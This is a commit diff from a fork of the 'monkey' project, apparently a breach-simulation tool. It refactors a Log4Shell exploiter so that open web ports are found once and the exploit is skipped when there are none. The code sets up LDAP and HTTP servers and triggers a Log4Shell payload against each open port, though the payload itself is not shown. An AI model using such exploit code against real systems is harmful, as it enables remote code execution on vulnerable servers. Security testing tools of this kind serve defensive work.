forked from p15670423/monkey
Agent: Skip Log4Shell exploiter if there are no open ports
This commit is contained in:
parent
6d87289bd0
commit
e576136a63
|
@ -45,8 +45,15 @@ class Log4ShellExploiter(WebRCE):
|
|||
self._ldap_server = None
|
||||
self._exploit_class_http_server = None
|
||||
self._agent_http_server_thread = None
|
||||
self._open_ports = [
|
||||
int(port[0]) for port in WebRCE.get_open_service_ports(self.host, self.HTTP, ["http"])
|
||||
]
|
||||
|
||||
def _exploit_host(self):
|
||||
if not self._open_ports:
|
||||
logger.info("Could not find any open web ports to exploit")
|
||||
return False
|
||||
|
||||
self._start_servers()
|
||||
try:
|
||||
return self.exploit(None, None)
|
||||
|
@ -130,11 +137,8 @@ class Log4ShellExploiter(WebRCE):
|
|||
def exploit(self, url, command) -> bool:
|
||||
# Try to exploit all services,
|
||||
# because we don't know which services are running and on which ports
|
||||
open_ports = [
|
||||
int(port[0]) for port in WebRCE.get_open_service_ports(self.host, self.HTTP, ["http"])
|
||||
]
|
||||
for exploit in get_log4shell_service_exploiters():
|
||||
for port in open_ports:
|
||||
for port in self._open_ports:
|
||||
try:
|
||||
exploit.trigger_exploit(self._build_ldap_payload(), self.host, port)
|
||||
except Exception as ex:
|
||||
|
|
Loading…
Reference in New Issue